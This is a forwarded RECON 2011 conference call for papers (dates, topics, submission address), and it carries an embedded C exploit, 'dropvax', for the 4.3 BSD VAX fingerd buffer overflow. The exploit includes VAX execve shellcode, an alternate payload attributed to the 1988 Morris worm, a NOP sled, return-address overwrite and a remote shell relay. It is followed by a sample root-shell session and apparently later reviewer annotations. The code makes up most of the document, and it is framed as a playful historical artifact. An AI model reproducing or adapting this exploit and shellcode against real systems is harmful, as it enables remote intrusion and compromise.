[ISN] RECON 2011 CFP

From: InfoSec News <alerts_at_private>
Date: Thu, 10 Mar 2011 04:22:00 -0600 (CST)
Forwarded from: hfortier (at) recon.cx

/*
+                    +                     +         +
                      +                  +           +
+                                             +
                \ /
             +     _        - _+_ -                   ,__
_=.    .:.         /=\       _|===|_                  ||::|
| | _|.        |   |     | |   | |     __===_  -=- ||::|
| ==|   |  |  __    |.:.|   /\| |:. | |    |   | .|| : |||::|
| | -  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
__|. | |_|. | |.|...||---|  |==| |   | | |_--.     ||   |||. |
| | | | . | | |::.||: .|  |==| | . : |=|===|    :|| . ||| .|
| : .| .|   |  | | |:.:|| . |  |==| |     |=|===| .   |'   | |  |
| | | | | '           :   .   |   ;     ;    '
| | | | | |
'     :      `   :   '            .       '  .      .         :
'     .                   R E C O N     2 0 1 1     .
`                .                .                           '
.           C F P

0000000    REC0N 2011 (http://recon.cx)
0000020    JULY 8-10
0000040    HYATT REGENCY (New venue)
0000060    M0NTREAL
0000100
0000120    + REC0N 2011
0000140     - Conference and training
0000160     - No censorship, no sales pitches
0000200     - Videos from 2010 are coming online
0000220
0000240    + Now accepting submissions
0000260     - Single track
0000300     - 60 & 30 minute time slots
0000320     - Lightning talks at the party
0000340
0000360    + Primary topics
0000400     - Reverse engineering and/or exploitation:
0000420       + Software
0000440         - Malware
0000460         - Protection/DRM
0000500         - Anti-reversing
0000520         - Static/runtime analysis
0000540       + Hardware
0000560         - Embedded devices, consoles, femtocell
0000600         - Cellphones
0000620         - RFID, SDR (software defined radio)
0000640         - Side channel attacks
0000660         - Physical security (cameras, access control)
0000700       + Protocol
0000720         - GSM / CDMA
0000740
0000760    + Also of interest to us
0001000     - Privacy
0001020       + Anti-censorship
0001040       + Anti-surveillance
0001060       + Anonymity
0001100       + Counter-forensics
0001120
0001140    + Anything else elite
0001160
0001200    + Please include
0001220      - Short summary
0001240      - Name or alias
0001260      - Contact information
0001300      - Bio
0001320
0001340    + Important dates
0001360      - Training/conference registration opens March 20, 2011
0001400      - First round of selections: April 10, 2011
0001420      - CFP closes May 15, 2011
0001440
0001460    + Send submissions to
0001500      - cfp2011 @ recon.cx
0001520
0001540    + Speaker / attendee privacy
0001560      - Recon does not require that speakers use their real names
0001600      - Recon does not provide attendee or speaker information to
third-parties
0001620        (except where necessary for registration/payment)

* w0rd, n0w ph0r th3 g00dz..
* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
*
* dr0pv4x.c
* t0p-s3kR1t w4r3z k0m1n' @ ya
* str8 fr0m the k0d3l1n3
*   -th3 phr3zh pr1nc3 0f b3llk0r3

 * w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:

route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup
guys), 8lgm,
klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root_at_private (lol), SN,
Fravia, Mammon_,
m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham,
lcamtuf, Ilfak,
archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George,
hypatia, tdz, Lady Gaga,
Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm,
das_modem, imm,
w1z4rd, l0renz, Subgraph & The Future Crew

 * a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz

 * st3p 1: c0mp1l3

 * st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4

         OLD WAREZ = NO WAREZ ;)

 * st3p 3: ./dr0pv4x [target] offset

          + pr3st0 +

$ ./dropvax X.X.X.X -12345
[+] ATDT X.X.X.X
[+] CONNECT 9600
[+] Return address: 0xUWISH
[*] Compiled for little-endian arch.
[+] Sent payload...
[+] Shell!
4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
16:56  up  6:08,  1 user,  load average: 0.09, 0.06, 0.03
User     tty from           login@  idle   JCPU   PCPU  what
root     co                  10:49     1                -sh -if
whoami:
root
Warning: no access to tty; thus no job control in this shell...
# exit

k p8ce 0ut,
- dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3

 Responsible Disclosure:

++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0
f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++

* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
        (research purposes only!!!)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <stdint.h>
#include <limits.h>
#include <signal.h>
#include <errno.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/*
 * bswap(): the payload words further down are written as host-order
 * constants but must leave the wire in VAX (little-endian) byte order.
 * Building with -DBIG_ENDIAN_ARCH turns bswap() into a 32-bit byte
 * reversal; otherwise it is the identity.  The big-endian form expands
 * `value` four times, so only side-effect-free expressions belong in it.
 * It refers to u32, which is only typedef'd below; that is fine because
 * a macro is expanded at its use sites, not at its definition.
 */
#ifdef BIG_ENDIAN_ARCH

#define bswap(value) \
(((u32) (value)) << 24 |\
(((u32) (value)) & 0x0000FF00) << 8 |\
(((u32) (value)) & 0x00FF0000) >> 8 |\
((u32) (value)) >> 24)

#else

#define bswap(value) (value)

#endif

/* Pre-ANSI idiom.  <errno.h> is already included above, and on libcs
 * where errno is a macro this declaration is redundant at best. */
extern int errno;

int try_finger(char *, int);	/* deliver the overflow; -1 on setup failure, 0 after the session ends */
void fdsh(int);			/* relay stdin/stdout across the connected socket */

/* Equivalent to `typedef uint32_t u32;` (C allows the storage-class
 * specifier anywhere among the declaration specifiers).  uint32_t is
 * declared in <stdint.h>; the listing does not include it directly and
 * whether <sys/types.h> pulls it in is system-dependent. */
uint32_t typedef u32;


#ifndef USE_ALTERNATE_SHELLCODE		/* VAX-11 shellcode w/ explanation */

/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory: a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with the "callg" instruction)
are the saved register mask, and in _start's case this is zero (it does not
matter).
Furthermore, this line in kern_exec.c checks if:

if (ap == NULL && uap->envp) {
                       uap->argp = NULL;
	...
}

So we don't need a valid argv at address zero.
See the VAX Architecture Reference Manual (VARM) or the
VAX Architecture Handbook.

http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/

/*
 * Hand-assembled VAX-11 execve("/bin/sh", 0, 0) stub.  The per-byte
 * decodings in the trailing comments are the author's; nothing in this
 * listing (no disassembly, no captured output) confirms them.  Note that
 * the literal contains embedded NUL octets, and that sizeof(shellcode)
 * also counts the string's terminating NUL, so a caller that copies
 * sizeof(shellcode) bytes (try_finger does) ships that extra zero byte.
 */
unsigned char shellcode[] =
"\021\017"         /* brb shellcode+0x11 (PC-relative) */
"\272\001"         /* popr $0x1 (this is a mask: pop one word into r0) */
"\335\000\335\000" /* pushl $0 ; pushl $0 */
"\335P"            /* pushl %r0 (address of /bin/sh string) */
"\335\003"         /* pushl $0x3 */
"\320^\\"          /* movl %sp, %ap */
"\274;"            /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
"\026\357\353"     /* jsb shellcode+0x4 (PC-relative) */
"\377\377\377"
"/bin/sh";         /* .asciz "/bin/sh" */

#else /* USE_ALTERNATE_SHELLCODE */          /* RTMorris Internet Worm (1988) */

/* If you think the shellcode is the problem, try this one. */

/*
 * Alternate payload as 32-bit words (the author attributes it to the
 * 1988 Internet worm).  Each word goes through bswap() so the bytes reach
 * the VAX in little-endian order regardless of the build host (see
 * BIG_ENDIAN_ARCH above).  The ASCII of "/bin/sh" is visible inside the
 * first three words (0x2f 0x62 0x69 0x6e 0x73 0x68), so this variant
 * appears to carry the path inline rather than as a trailing literal.
 * Being a u32 array, sizeof(shellcode) is 7 * 4 = 28 here and there is
 * no terminating NUL, unlike the string form.
 */
u32 shellcode[] =
{
bswap(0x732f8fdd),
bswap(0x8fdd0068),
bswap(0x6e69622f),
bswap(0xdd5a5ed0),
bswap(0xdd00dd00),
bswap(0xd003dd5a),
bswap(0x3bbc5c5e)
};

#endif


/* Send(): write the C string `str` to the socket named `sock` in the
 * enclosing scope.  `str` is expanded twice (strlen and send), so only
 * side-effect-free expressions belong in it; every use below is a literal. */
#define Send(str) send(sock, (str), strlen(str), 0)

/*
 * Drive the post-exploitation session on `sock`.  Called by try_finger()
 * right after the payload is written.  Nothing here confirms that a shell
 * actually came up: it sleeps one second, pushes a fixed batch of shell
 * commands, then relays raw bytes between stdin/stdout and the socket
 * until select(2) fails or either side returns <= 0 from read(2).
 *
 * send(2) and write(2) results are ignored, so a short write silently
 * drops bytes.  Both read-failure paths print the same "read(2)"
 * diagnostic, and on a clean EOF (read returns 0) perror() reports
 * whatever stale errno happens to be set.
 */
void fdsh(int sock)
{
printf("[+] Sent payload...\n");

sleep(1);
/* NOTE(review): the argument below is an unterminated string literal --
 * the line break after the ';' has no continuation, so this does not
 * compile as shipped.  The header states that exactly one line was
 * broken on purpose; it is left untouched here. */
Send("echo '[+] Shell!';
PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");	/* kernel banner line, cf. the sample session in the header */
/* csh -i forces interactive mode, -f skips .cshrc.  The sample transcript
 * in the header shows "-sh -if" under `w`, not csh, so that transcript and
 * this command line do not match. */
Send("w ; echo whoami: ; whoami; exec csh -if\n");

for (;;) {
fd_set fds;
char buf[2048];
int nb;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
perror("select");
return;
}
if (FD_ISSET(0, &fds)) {
/* local stdin -> target, unmodified */
nb = read(0, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
           }
   send(sock, buf, nb, 0);
}
if (FD_ISSET(sock, &fds)) {
/* target -> local stdout, unmodified */
nb = read(sock, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
write(1, buf, nb);
	}
    }
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
* the BSD 4.3 fingerd binary.  It sends 536 bytes (plus a newline) to
* overwrite six extra words in the stack frame, including the return
* PC, to point into the middle of the string sent over.  The instructions
* in the string do the direct system call version of execve("/bin/sh"). */

/* From sp4f ^^^^^^^ (lolololol) */

/*
* Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>):
*/
#if 0
struct frame {
int     fr_handler;
u_int   fr_psw:16,              /* saved psw */
fr_mask:12,             /* register save mask */
:1,
fr_s:1,                 /* call was a calls, not callg
*/
fr_spa:2;               /* stack pointer alignment */
int     fr_savap;               /* saved arg pointer */
int     fr_savfp;               /* saved frame pointer */
int     fr_savpc;               /* saved program counter */
	};
#endif

/*
 * Build and deliver the fingerd overflow described in the block comment
 * above (a fixed 512-byte input buffer on a 4.3 BSD VAX), then hand the
 * socket to fdsh() as an interactive relay.  The addresses below are
 * specific to that target; nothing else is meant to be reachable by it.
 *
 * host   -- dotted quad, or a hostname resolved with gethostbyname(3).
 * offset -- subtracted from the fixed base 0x7fffe8a8 to form the
 *           return address.  The int is converted to u32 first, so a
 *           negative value (as in the header's sample run) wraps and
 *           effectively moves the address upward.
 *
 * Returns -1 if resolution, socket creation or connect fails, and 0
 * once fdsh() returns.  Every send(2) result is ignored.
 *
 * Payload layout (buf is exactly 536 bytes, the length quoted above):
 *   [0,400)      0x01 bytes (the VAX NOP opcode, per the author)
 *   [400,400+n)  shellcode, n = sizeof(shellcode): 31 for the string
 *                form (terminating NUL included), 28 for the u32 form
 *   [400+n,512)  zero bytes
 *   [512,536)    six 32-bit words stored through a u32 cast.  Which word
 *                lands on which field of the target's frame cannot be
 *                derived from this listing; the author only says they
 *                overwrite "six extra words ... including the return PC".
 */
int try_finger(char *host, int offset)
{
int s, i;
struct sockaddr_in sin = { 0 };
u32 retaddr = 0x7fffe8a8 - offset;
char buf[536];

sin.sin_family = PF_INET;	/* AF_INET is the conventional constant here; the two are defined to the same value on common systems */
sin.sin_port = htons(79);	/* finger */
sin.sin_addr.s_addr = inet_addr(host);

/* inet_addr() signals failure with INADDR_NONE (all ones).  Comparing the
 * unsigned field against -1 works by conversion, but it also makes the
 * valid address 255.255.255.255 look like a parse failure. */
if (sin.sin_addr.s_addr == -1) {
struct hostent *h;
h = gethostbyname(host);
if (h == NULL) {
herror("gethostbyname(3)");
return -1;
}
/* Copies exactly four bytes without checking h_addrtype or h_length. */
bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
}

if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
perror("socket(2)");
return -1;
}

    printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));

/* On this failure path `s` is never closed; main() exits shortly after,
 * so the leak is only cosmetic, but a close(s) would be correct. */
if (connect(s, (void *)&sin, sizeof(sin)) < 0){
perror("connect(2)");
printf("[-] NO DIALTONE\n");
return -1;
}

    printf("[+] CONNECT 9600\n");

for (i = 0; i < 400; i++)
buf[i] = '\001';       /* VAX-11 NOP -- a sled in front of the code */

    bcopy(shellcode, buf + 400, sizeof(shellcode));

for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
buf[i] = '\0';	      /* VAX-11 HALT, try not to land on one. */

    printf("[+] Return address: %#x\n", retaddr);	/* %#x assumes u32 is unsigned int; PRIx32 would be exact */

#ifdef BIG_ENDIAN_ARCH
    printf("[*] Compiled for big-endian arch.\n");
#else
    printf("[*] Compiled for little-endian arch.\n");
#endif

/* Index 128 of a u32 view is byte 512, the first byte past the target's
 * 512-byte buffer; indices 128..133 cover bytes 512..535.  Storing
 * through a u32 pointer assumes the char array is 4-byte aligned
 * (memcpy() per word would not).  The first five words are swapped into
 * VAX order on a big-endian host; the trailing zero needs no swap. */
*((u32 *)buf + 128) = bswap(0x7fffeab0);
*((u32 *)buf + 129) = bswap(0x7fffeb60);
*((u32 *)buf + 130) = bswap(0x20000000);
*((u32 *)buf + 131) = bswap(0x7fffeb64);
*((u32 *)buf + 132) = bswap(retaddr);
*((u32 *)buf + 133) = 0;

send(s, buf, sizeof(buf), 0);  	/* sizeof (buf) == 536 */
send(s, "\n", 1, 0);		/* terminates the line the remote reads */

/* fdsh() returns only on select/read error or EOF; the socket is left
 * open for the process exit to reclaim. */
fdsh(s);
printf("[-] NO CARRIER\n");
return 0;
}

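/*
 * Entry point: `dropvax hostname [offset]`.
 *
 * argv[argc] is NULL, so the original's unconditional read of v[2] was
 * out of bounds whenever only the program name was given; every argv
 * access is now guarded by argc.  The optional offset is parsed with
 * strtol(3) and rejected (message on stderr, exit status 1) unless the
 * whole argument is a decimal integer that fits in an int -- atoi(3)
 * would have silently turned garbage into 0.  The usage text is
 * unchanged.  Exit status is 1 when try_finger() reports a setup
 * failure and 0 otherwise (the original always exited 0).
 */
int main(int c, char **v)
{
	const char *prog = (c > 0 && v[0] != NULL) ? v[0] : "dropvax";

	if (c < 2) {
		fprintf(stderr, "usage: %s hostname [offset]\n", prog);
		exit(1);
	}

	int offset = 0;
	if (c > 2) {
		char *end;
		errno = 0;
		long val = strtol(v[2], &end, 10);
		if (end == v[2] || *end != '\0' || errno == ERANGE ||
		    val < INT_MIN || val > INT_MAX) {
			fprintf(stderr, "%s: bad offset '%s'\n", prog, v[2]);
			exit(1);
		}
		offset = (int)val;
	}

	return try_finger(v[1], offset) < 0 ? 1 : 0;
}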

